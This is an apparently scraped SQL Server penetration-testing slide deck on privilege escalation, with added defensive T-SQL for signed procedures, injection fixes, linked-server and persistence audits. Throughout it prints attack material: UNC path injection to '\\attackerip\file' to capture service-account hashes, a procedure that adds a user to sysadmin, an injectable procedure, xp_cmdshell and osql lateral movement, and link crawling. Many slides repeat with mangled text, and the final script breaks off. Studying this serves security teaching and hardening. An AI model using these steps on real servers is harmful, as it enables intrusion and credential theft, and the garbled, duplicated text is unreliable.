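The signed-procedure recipe above, written out end to end as an added example (not code from the slides or from PowerUpSQL) for SQL Server 2012 or later. It assumes a database AppDb with an existing low-privilege user AppUser; the procedure dbo.usp_ListActiveSessions, certificate ProcSigningCert and login ActiveSessionsSigner are constructed names.

```sql
-- Added example (not from the original slides): "Use signed procedures",
-- steps 1-7, with constructed names. Run as a sysadmin. The procedure needs
-- VIEW SERVER STATE, a server-level permission AppUser does not have.
USE AppDb;
GO

-- Step 1: create the stored procedure. No WITH EXECUTE AS OWNER and the
-- database stays TRUSTWORTHY OFF: callers gain only what the signature
-- carries, and only while this exact procedure body runs.
CREATE PROCEDURE dbo.usp_ListActiveSessions
AS
BEGIN
    SET NOCOUNT ON;
    -- Without VIEW SERVER STATE a login sees only its own row here.
    SELECT session_id, login_name, host_name, program_name, login_time
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END;
GO

-- Step 2: create a database master key; it protects the certificate's
-- private key while we sign.
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys
               WHERE name = '##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<placeholder: strong password>';
GO

-- Step 3: create a certificate used for nothing but signing.
CREATE CERTIFICATE ProcSigningCert
    WITH SUBJECT = 'Signs dbo.usp_ListActiveSessions',
         EXPIRY_DATE = '20991231';
GO

-- Steps 4 and 5: create a login from the certificate and configure its
-- privileges. Logins live in master, so copy only the PUBLIC half there
-- (CERTENCODED never returns the private key). Calling sp_executesql with
-- a three-part name runs the statement in master's context.
DECLARE @pub varbinary(max) =
    (SELECT CERTENCODED(certificate_id)
     FROM sys.certificates WHERE name = 'ProcSigningCert');
DECLARE @sql nvarchar(max) =
      N'CREATE CERTIFICATE ProcSigningCert FROM BINARY = '
    + CONVERT(nvarchar(max), @pub, 1) + N';'
    + N'CREATE LOGIN ActiveSessionsSigner FROM CERTIFICATE ProcSigningCert;'
    + N'GRANT VIEW SERVER STATE TO ActiveSessionsSigner;';   -- one permission, not sysadmin
EXEC master.sys.sp_executesql @sql;
GO

-- Step 6: sign the procedure. Then remove the private key so nobody
-- (db_owner included) can attach this login's permission to another module.
-- Any ALTER PROCEDURE drops the signature, so BACKUP CERTIFICATE ... WITH
-- PRIVATE KEY first if you will need to re-sign after legitimate changes.
ADD SIGNATURE TO dbo.usp_ListActiveSessions BY CERTIFICATE ProcSigningCert;
ALTER CERTIFICATE ProcSigningCert REMOVE PRIVATE KEY;
GO

-- Step 7: GRANT EXECUTE to the application user. It can now run the
-- procedure and see every session, but still cannot query the DMV itself.
GRANT EXECUTE ON dbo.usp_ListActiveSessions TO AppUser;
GO

-- Verification: TRUSTWORTHY was never turned on, and the signature is
-- recorded against the certificate.
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
SELECT OBJECT_NAME(cp.major_id) AS module_name,
       c.name                   AS certificate_name,
       cp.crypt_type_desc
FROM sys.crypt_properties AS cp
JOIN sys.certificates     AS c ON c.thumbprint = cp.thumbprint
WHERE cp.class_desc = 'OBJECT_OR_COLUMN';
```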
Escalating Privileges: Impersonation. SQL Injection Example

CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    DECLARE @query AS varchar(max)
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
    EXECUTE(@query)
END
GO
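The same procedure with the injection removed, added here as an example (not from the original slides). Because the caller's value never becomes part of the SQL text, whatever EXECUTE AS context the procedure runs in cannot be hijacked through this parameter; sp_sqli2_fixed and sp_sqli2_dynamic_fixed are constructed names.

```sql
-- Added example (not from the original slides): sp_sqli2 hardened.
-- Option 1: no dynamic SQL at all. The filter above is static; only the
-- pattern value varies, and a parameter handles that.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname                -- database names are sysname, not varchar(max)
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name
    FROM master.sys.databases
    WHERE name LIKE N'%' + @DbName + N'%'   -- concatenation of DATA, not of SQL text
       OR name = N'tempdb';
END;
GO

-- Option 2: when dynamic SQL really is needed (object or column names that
-- vary), keep values as sp_executesql parameters and quote any identifier
-- with QUOTENAME. Never paste user input into the statement string.
CREATE PROCEDURE dbo.sp_sqli2_dynamic_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @pattern nvarchar(130) = N'%' + @DbName + N'%';
    DECLARE @query   nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE @p OR name = N''tempdb'';';
    EXEC sp_executesql @query, N'@p nvarchar(130)', @p = @pattern;
END;
GO

-- Check: a classic terminator-and-comment value is now just a LIKE pattern
-- that matches no database, so only tempdb comes back. In the original
-- sp_sqli2 the same value would have closed the literal and run a second
-- statement under the procedure's execution context.
EXEC dbo.sp_sqli2_fixed         @DbName = N'x'';SELECT @@VERSION;--';
EXEC dbo.sp_sqli2_dynamic_fixed @DbName = N'x'';SELECT @@VERSION;--';
```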
Escalating Privileges: Shared Service Accounts. Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones, ADS, a Low Value Application (LVA) and a High Value Application (HVA); web traffic on ports 80 and 443, SQL Server traffic on ports 1433 and 1434. Steps shown: (1) SQL injection against the LVA; (2) execute local command via xp_cmdshell; (3) execute commands and gather data from other database servers via osql, giving access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links. What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation):
SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: Leveraging MS SQL Database links. Same network diagram (Internet, DMZ, Intranet, ADS; ports 80 and 443 to the applications, ports 1433 and 1434 to the SQL Servers). Steps shown: (1) SQL injection against the LVA reaches DB1, which has a DB link with least privileges to one server and a DB link with the SA account to another, leading to the HVA; (2) execute SQL queries and local commands on database servers via nested linked servers. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links. Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
The max number of hops we've seen is 12
The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script: released 2012, https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions: author Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql
Escalating Privileges: Crawling Server Links. Function: Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
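A defender's inventory of the links on one instance and of how logins are mapped across them, which is what separates the "DB link with least privileges" from the "DB link with SA account" in the diagram above. This is an added example, not part of the slides or of PowerUpSQL; it reads only the system catalog (sys.servers, sys.linked_logins) and assumes no names.

```sql
-- Added example (not from the original slides): linked server and login
-- mapping review. Run as sysadmin (or with VIEW ANY DEFINITION).
SELECT s.name                    AS link_name,
       s.product, s.provider, s.data_source,
       s.is_rpc_out_enabled,     -- needed for EXEC ... AT link (procedures such as xp_cmdshell)
       s.is_data_access_enabled, -- needed for OPENQUERY / four-part names
       CASE WHEN ll.local_principal_id = 0
            THEN N'<any local login, including public>'
            ELSE SUSER_NAME(ll.local_principal_id)
       END                       AS local_login,
       ll.uses_self_credential,  -- 1: caller's own credentials are forwarded
       ll.remote_name,           -- fixed remote login used by this mapping
       CASE
         WHEN ll.server_id IS NULL
              THEN N'no login mapping: remote connections are refused'
         WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0
              AND ll.remote_name = N'sa'
              THEN N'HIGH: every local login, public included, becomes sa remotely'
         WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0
              THEN N'REVIEW: every local login maps to one fixed remote login'
         WHEN ll.local_principal_id = 0
              THEN N'REVIEW: every local login is forwarded with its own credentials'
         ELSE N'scoped mapping for a named local login'
       END                       AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Hardening for a HIGH/REVIEW row (names from the output):
--   EXEC sp_droplinkedsrvlogin @rmtsrvname = N'<link>', @locallogin = NULL;   -- drop the catch-all mapping
--   EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'<link>', @useself = N'FALSE',
--        @locallogin = N'<specific local login>', @rmtuser = N'<low-privilege remote login>',
--        @rmtpassword = N'<placeholder>';
--   EXEC sp_serveroption N'<link>', N'rpc out', N'false';   -- unless remote procedure calls are required
```

Links crawled from a remote server show up here only on that server, so the review has to be repeated per instance (or fed by Get-SQLServerLink across the estate).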
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin. Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin. Here are some tool options
Approach: Common Tools
Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts (slide build). Network diagram with Internet, DMZ and Intranet zones; hosts LRA, HVA, LVA and ADS; labels "Ports 80 and 443" and "Ports 1433 and 1434"; attacker shown as Captain Evil / PURE EVIL. Key: HVA = High Value Application, LVA = Low Value Application. Steps in the build: (1) SQL injection; (2) execute local command via xp_cmdshell; access to HVA with shared domain service account; (3) execute commands and gather data from other database servers via osql.]
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
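An inventory query for linked servers and their login mappings, added here as an example and not part of PowerUpSQL; it reads only sys.servers and sys.linked_logins, so no names are assumed. The mapping is what decides whether a link carries the caller's identity or a fixed remote login: a link mapped for all local logins to a fixed privileged login is the "DB Link with SA account" case, while a link with no mapping at all (connection not made) is the least-privilege case.

```sql
-- Added audit query (not from the slides): list every linked server with
-- the login mapping it uses and a plain-language assessment per row.
-- Run as sysadmin or a login with VIEW ANY DEFINITION.
SELECT s.name                      AS linked_server,
       s.product,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,       -- required for EXEC ... AT [server]
       s.is_data_access_enabled,   -- required for OPENQUERY
       CASE WHEN ll.local_principal_id = 0
            THEN N'<all logins>'   -- local_principal_id 0 = "all other logins"
            ELSE SUSER_NAME(ll.local_principal_id)
       END                         AS local_login,
       ll.uses_self_credential,    -- 1 = caller's own credentials are passed
       ll.remote_name              AS fixed_remote_login,
       CASE WHEN ll.local_principal_id = 0
             AND ll.uses_self_credential = 0
             AND ll.remote_name IS NOT NULL
            THEN N'REVIEW: every local login reaches ' + s.name
                 + N' as ' + ll.remote_name
            WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NULL
            THEN N'no mapping: connection is not made (least privilege)'
            WHEN ll.uses_self_credential = 1
            THEN N'caller credentials passed through'
            ELSE N'fixed remote login for one local login: ' + ll.remote_name
       END                         AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;
```

Rows flagged REVIEW are the ones a crawler can ride without any credentials of its own; whether they matter depends on what the fixed remote login can do on the far side.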
[Figure: Leveraging MS SQL Database links (slide build). Same network diagram (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; labels "Ports 80 and 443" and "Ports 1433 and 1434"; attacker Captain Evil / PURE EVIL; key: HVA = High Value Application, LVA = Low Value Application), now with a database server DB1 (LVA) joined to the HVA by two links, one labelled "DB Link with Least Privileges" and one "DB Link with SA account". Steps in the build: (1) SQL injection; (2) execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
• Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
• Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Function / Description
• Get-SQLServerLink: Get a list of SQL Server links on the server
• Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008

Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.

Escalating Privileges: UNC Path Injection (DEMO)
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options (Approach: Common Tools):
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: Psexec, accessibility options, debugger, with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
  • SQL Server layer: startup procedures, agent jobs, triggers, modified code
  • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
  • Target large databases
  • Locate transparently encrypted databases
  • Search columns based on keywords and sample data
  • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
  • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
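A defender-side counterpart to item 1 above, added here as an example and not PowerUpSQL code: one batch that enumerates the SQL Server layer persistence points the slide names (startup procedures, Agent jobs, server and database triggers) from the catalog views, with modify dates so recent changes stand out. Run it as sysadmin; no object names are assumed.

```sql
-- Added persistence audit (not from the slides). Each SELECT covers one
-- of the SQL Server layer persistence spots listed above.

-- Startup procedures: anything in master flagged to run at service start.
SELECT 'startup procedure' AS kind,
       QUOTENAME(SCHEMA_NAME(schema_id)) + '.' + QUOTENAME(name) AS name,
       modify_date
FROM master.sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

-- Agent jobs: owner, subsystem and a preview of the first step's command.
-- A CmdExec or PowerShell subsystem on a job nobody recognises is the
-- usual tell; the owner login shows whose rights it runs under.
SELECT 'agent job' AS kind,
       j.name,
       SUSER_SNAME(j.owner_sid) AS owner_login,
       s.subsystem,
       LEFT(s.command, 200) AS command_preview,
       j.date_modified AS modify_date
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id AND s.step_id = 1
WHERE j.enabled = 1;

-- Server-level DDL and logon triggers fire for every session or DDL
-- statement on the instance, so they are the highest-impact entries.
SELECT 'server trigger' AS kind, name, modify_date, is_disabled
FROM sys.server_triggers;

-- Database-level DDL triggers in the current database (rerun per database).
SELECT 'database trigger' AS kind, name, modify_date, is_disabled
FROM sys.triggers
WHERE parent_class_desc = 'DATABASE';
```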
2. Get principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just principal ID
4. Increment number and repeat
select n [id], SUSER_NAME(n) [user_name]
from (
    select top 10000 row_number() over(order by t1.number) as N
    from master..spt_values t1 cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null
Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
3. Grab the first 48 bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. Sysadmins can execute OS commands.
2. Those OS commands run as the SQL Server service account, not as the SQL login that issued them.
3. Service accounts have sysadmin privileges by default (setup grants this to the account itself on SQL Server 2008 and earlier; on 2012 and later the grant goes to the per-service SID, but a shared domain account is very often granted sysadmin explicitly on every instance it runs).
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones: an LVA reachable on ports 80 and 443, HVA database servers reachable on ports 1433 and 1434, and ADS. Steps shown: (1) SQL injection against the LVA; (2) execute a local command via xp_cmdshell; (3) access the HVA with the shared domain service account, then execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
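The chain in the figure written out in T-SQL from a sysadmin login on the low-value server, as an added example that is not from the slides or PowerUpSQL. HVA-SQL01 is a placeholder server name, and the sys.dm_server_services DMV used to read the service account needs SQL Server 2008 R2 SP1 or later.

```sql
-- Added example, not from the slides. Server name HVA-SQL01 is a placeholder.

-- 1. Which Windows account runs this instance? On SQL Server 2008 R2 SP1 and later
--    this DMV lists every SQL service with its logon account. A domain account
--    (CORP\svc_sql style) rather than a virtual or managed service account is the
--    "one account to rule them all" signal.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;

-- 2. xp_cmdshell runs as that service account, not as the SQL login that called it.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';            -- returns the service account name

-- 3. A trusted connection (-E) started from inside that process authenticates to
--    the high-value instance as the same domain account. If that account is a
--    sysadmin there (setup made it one on SQL Server 2008 and earlier; on later
--    versions it is still commonly granted by hand), the second server is owned
--    without touching any of its passwords. osql ships with older clients; sqlcmd
--    takes the same switches.
EXEC master..xp_cmdshell
  'osql -E -S HVA-SQL01 -Q "SELECT @@servername AS srv, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin"';

-- 4. Defender's check, run on each instance: a service account that is also a
--    sysadmin login is exactly the condition that makes step 3 work.
SELECT s.servicename, s.service_account
FROM sys.dm_server_services AS s
JOIN sys.server_principals AS p ON p.name = s.service_account
WHERE IS_SRVROLEMEMBER('sysadmin', p.name) = 1;
```

Step 4 only sees one instance at a time; collecting its output from every server and grouping by service_account is what turns "this account is sysadmin here" into "this one account is sysadmin on hundreds of servers".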
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links (linked servers) are persistent connections from one SQL Server to another, each configured with its own login mapping.
Why should I care?
Short answer: privilege escalation.
• The public role can use links to execute queries on remote servers, and those queries run as the login the link was configured with, not as the caller (impersonation):
SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@version')
• Stored procedures can be executed through links (xp_cmdshell).
• Links can be crawled: every server reached has links of its own.
[Figure: Leveraging MS SQL Database Links. Network diagram with Internet, DMZ and Intranet zones: an LVA reachable on ports 80 and 443, database servers (DB1, HVA) reachable on ports 1433 and 1434, and ADS. Steps shown: (1) SQL injection against the LVA; from DB1, a DB link configured with least privileges leads to a server whose own DB link is configured with the SA account; (2) execute SQL queries and local commands on database servers via nested linked servers. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration test stats:
• Database links exist (and can be crawled) in about 50% of the environments we've seen.
• The max number of hops we've seen is 12.
• The max number of servers crawled is 226.
Escalating Privileges: Crawling Server Links
Old script: released 2012, https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New functions: author Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Function: Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
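The raw T-SQL that Get-SQLServerLinkCrawl automates, as an added example that is not from the slides or PowerUpSQL. Link names [SQLSERVER2] and [SQLSERVER3] are placeholders; the OS command steps assume RPC Out is enabled on the link and that the link's mapped login is sysadmin on the far side.

```sql
-- Added example, not the slides' or PowerUpSQL's code. [SQLSERVER2] and [SQLSERVER3]
-- are placeholder link names.

-- 1. Enumerate links on the current server and how each one authenticates.
--    remote_name = 'sa' (or any sysadmin) is the link worth following;
--    uses_self_credential = 1 means the link forwards the caller's own identity.
SELECT s.name, s.data_source, s.is_rpc_out_enabled,
       l.remote_name, l.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. One hop. The string runs on SQLSERVER2 under the link's mapped login, whatever
--    our local privileges are; when the mapping applies to all logins, public can do it.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT @@servername AS srv, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

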